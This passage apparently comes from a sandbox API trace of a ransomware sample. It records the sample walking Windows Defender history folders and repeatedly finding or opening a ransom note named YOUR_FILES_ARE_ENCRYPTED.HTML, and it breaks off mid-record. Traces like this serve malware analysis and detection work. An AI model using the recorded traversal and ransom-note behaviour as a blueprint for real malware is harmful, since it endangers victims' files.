ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.303] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf2ed76f, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf2ed76f, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf2f129c, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.303] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0110.303] wnsprintfW (in: pszDest=0x30b0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\10\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 113 [0110.303] GetProcessHeap () returned 0x600000 [0110.303] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315b018 [0110.303] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\10\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\history\\mput\\mputhistory\\10\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.303] GetProcessHeap () returned 0x600000 [0110.304] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315b018 | out: hHeap=0x600000) returned 1 [0110.304] GetProcessHeap () returned 0x600000 [0110.304] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30b0050 | out: hHeap=0x600000) returned 1 [0110.305] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x2a531b1c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62eda0, dwReserved1=0x19df88, cFileName="11", cAlternateFileName="")) returned 1 [0110.305] StrStrIW (lpFirst="11", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.305] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\11") returned 83 [0110.305] GetProcessHeap () returned 0x600000 [0110.305] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30b0050 [0110.306] lstrcpyW (in: lpString1=0x30b0050, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\11" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\11") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\11" [0110.306] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\11", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\11\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\11\\*" [0110.306] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\11\\*", lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xaf2f9c3a, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0110.306] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xaf2f9c3a, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="..", cAlternateFileName="")) returned 1 [0110.306] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="200", cAlternateFileName="")) returned 1 [0110.306] StrStrIW (lpFirst="200", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.306] wnsprintfW (in: pszDest=0x30b0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\11\\200") returned 87 [0110.306] PathFindExtensionW (pszPath="200") returned="" [0110.306] lstrlenW (lpString="") returned 0 [0110.306] PathFindExtensionW (pszPath="200") returned="" [0110.306] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf2f9c3a, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf2f9c3a, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf2fd540, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.306] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf2f9c3a, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf2f9c3a, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf2fd540, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.306] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0110.306] wnsprintfW (in: pszDest=0x30b0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\11\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 113 [0110.306] GetProcessHeap () returned 0x600000 [0110.307] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315b018 [0110.307] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\11\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\history\\mput\\mputhistory\\11\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.307] GetProcessHeap () returned 0x600000 [0110.307] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315b018 | out: hHeap=0x600000) returned 1 [0110.307] GetProcessHeap () returned 0x600000 [0110.307] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30b0050 | out: hHeap=0x600000) returned 1 [0110.308] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x2a531b1c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62eda0, dwReserved1=0x19df88, cFileName="12", cAlternateFileName="")) returned 1 [0110.308] StrStrIW (lpFirst="12", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.308] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\12") returned 83 [0110.308] GetProcessHeap () returned 0x600000 [0110.308] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30b0050 [0110.309] lstrcpyW (in: lpString1=0x30b0050, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\12" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\12") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\12" [0110.309] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\12", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\12\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\12\\*" [0110.309] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\12\\*", lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xaf308501, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0110.309] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xaf308501, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="..", cAlternateFileName="")) returned 1 [0110.310] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="194", cAlternateFileName="")) returned 1 [0110.310] StrStrIW (lpFirst="194", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.310] wnsprintfW (in: pszDest=0x30b0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\12\\194") returned 87 [0110.310] PathFindExtensionW (pszPath="194") returned="" [0110.310] lstrlenW (lpString="") returned 0 [0110.310] PathFindExtensionW (pszPath="194") returned="" [0110.310] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf308501, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf308501, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf30bf67, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.310] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf308501, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf308501, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf30bf67, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.310] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0110.310] wnsprintfW (in: pszDest=0x30b0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\12\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 113 [0110.310] GetProcessHeap () returned 0x600000 [0110.310] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315b018 [0110.310] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\12\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\history\\mput\\mputhistory\\12\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.310] GetProcessHeap () returned 0x600000 [0110.310] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315b018 | out: hHeap=0x600000) returned 1 [0110.310] GetProcessHeap () returned 0x600000 [0110.310] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30b0050 | out: hHeap=0x600000) returned 1 [0110.311] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x2a531b1c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62eda0, dwReserved1=0x19df88, cFileName="13", cAlternateFileName="")) returned 1 [0110.311] StrStrIW (lpFirst="13", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.312] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\13") returned 83 [0110.312] GetProcessHeap () returned 0x600000 [0110.312] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30b0050 [0110.312] lstrcpyW (in: lpString1=0x30b0050, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\13" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\13") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\13" [0110.312] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\13", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\13\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\13\\*" [0110.312] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\13\\*", lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xaf315c32, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0110.313] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xaf315c32, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="..", cAlternateFileName="")) returned 1 [0110.313] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="278", cAlternateFileName="")) returned 1 [0110.313] StrStrIW (lpFirst="278", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.313] wnsprintfW (in: pszDest=0x30b0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\13\\278") returned 87 [0110.313] PathFindExtensionW (pszPath="278") returned="" [0110.313] lstrlenW (lpString="") returned 0 [0110.313] PathFindExtensionW (pszPath="278") returned="" [0110.313] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf315c32, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf315c32, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf3197df, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.313] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf315c32, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf315c32, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf3197df, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.313] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0110.313] wnsprintfW (in: pszDest=0x30b0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\13\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 113 [0110.313] GetProcessHeap () returned 0x600000 [0110.313] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315b018 [0110.314] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\13\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\history\\mput\\mputhistory\\13\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.314] GetProcessHeap () returned 0x600000 [0110.314] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315b018 | out: hHeap=0x600000) returned 1 [0110.314] GetProcessHeap () returned 0x600000 [0110.314] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30b0050 | out: hHeap=0x600000) returned 1 [0110.315] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x652573eb, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x652573eb, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x652573eb, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62eda0, dwReserved1=0x19df88, cFileName="14", cAlternateFileName="")) returned 1 [0110.315] StrStrIW (lpFirst="14", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.315] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\14") returned 83 [0110.315] GetProcessHeap () returned 0x600000 [0110.315] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30b0050 [0110.316] lstrcpyW (in: lpString1=0x30b0050, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\14" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\14") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\14" [0110.316] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\14", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\14\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\14\\*" [0110.316] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\14\\*", lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x652573eb, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x652573eb, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xaf3968fd, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0110.316] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x652573eb, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x652573eb, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xaf3968fd, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="..", cAlternateFileName="")) returned 1 [0110.316] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x652573eb, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x652573eb, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="9664", cAlternateFileName="")) returned 1 [0110.316] StrStrIW (lpFirst="9664", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.316] wnsprintfW (in: pszDest=0x30b0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\14\\9664") returned 88 [0110.316] PathFindExtensionW (pszPath="9664") returned="" [0110.316] lstrlenW (lpString="") returned 0 [0110.316] PathFindExtensionW (pszPath="9664") returned="" [0110.316] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf3968fd, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf3968fd, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf39b700, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.317] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf3968fd, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf3968fd, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf39b700, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, 